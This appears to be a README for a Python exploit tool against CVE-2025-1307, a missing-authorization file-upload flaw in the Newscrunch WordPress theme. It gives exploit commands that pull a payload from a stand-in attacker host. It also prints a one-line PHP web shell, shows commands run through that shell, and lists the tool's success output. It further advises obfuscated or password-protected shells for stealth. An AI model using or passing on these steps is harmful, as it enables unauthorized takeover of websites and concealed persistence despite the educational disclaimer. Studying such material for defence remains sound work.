# Newscrunch Exploit (CVE-2025-1307)

## 🚨 Overview
This exploit targets a critical vulnerability (**CVE-2025-1307**) in the **Newscrunch WordPress theme**. The flaw allows **authenticated users (Subscriber and above)** to upload arbitrary files due to missing capability checks in the `newscrunch_install_and_activate_plugin()` function. This can lead to **Remote Code Execution (RCE)**, compromising the affected WordPress site completely.

---

## 🔥 Vulnerability Details
- **CVE ID:** CVE-2025-1307
- **Affected Software:** Newscrunch WordPress Theme (<= 1.8.4.1)
- **CWE Classification:** [CWE-862 - Missing Authorization](https://cwe.mitre.org/data/definitions/862.html)
- **CVSS Score:** **9.8 (Critical)**
- **Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
- **Published Date:** March 4, 2025

### 🛑 Severity & Impact
- ✅ **Remote Code Execution (RCE)**
- ✅ **Full System Compromise**
- ✅ **Unauthorized File Upload**
- ✅ **Privilege Escalation Risk**

**Exploitability:** Requires a valid WordPress account with **Subscriber privileges or higher**.

---

## 📜 Script Features
✅ **Automated Exploitation of CVE-2025-1307**  
✅ **Auto-detection of vulnerable theme version**  
✅ **Automatic ZIP payload extraction and execution**  
✅ **Retrieves shell file name dynamically from ZIP**  
✅ **Auto-checks shell availability after exploitation**  
✅ **Clean and structured logging for debugging**  

---

## 🚀 How to Use

### 📌 Prerequisites
Ensure you have **Python 3.x** installed and install the required dependencies:
```bash
pip install requests urllib3 packaging
```

### 🔧 Running the Exploit
```bash
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"
```

### 🔹 Usage
```
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PAYLOAD_URL, --payload_url PAYLOAD_URL
                        Malicious file URL to upload
```

### 🛠️ Using the Uploaded Shell
Once the shell is successfully uploaded, it allows remote command execution on the target system. The shell file should be placed inside a ZIP archive, and it will be extracted automatically upon exploitation.

### 🔹 Creating the ZIP Payload
Ensure your PHP shell (shell.php) is inside a ZIP archive. Then, upload the ZIP file using the exploit.
```php
<?php system($_GET['cmd']); ?>
```

### 🔹 Executing Commands
You can execute system commands via the browser by appending the cmd parameter to the shell URL:
```
http://target/wp-content/plugins/shell.php?cmd=whoami
```

### ⚠️ Securing the Shell
- Since this is a simple web shell, it lacks authentication and should be used cautiously.
- If detected, it can be easily removed by administrators.
- Consider using obfuscated PHP code or password-protected shells for stealth operations.

### 🔹 Expected Output
```
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls
```

### ⚠️ Disclaimer
This tool is for educational and security research purposes only. Unauthorized exploitation of vulnerabilities is illegal and punishable by law. The author is not responsible for any misuse or damages caused by this tool. Use responsibly. 


*By: Nxploit | Khaled Alenazi*
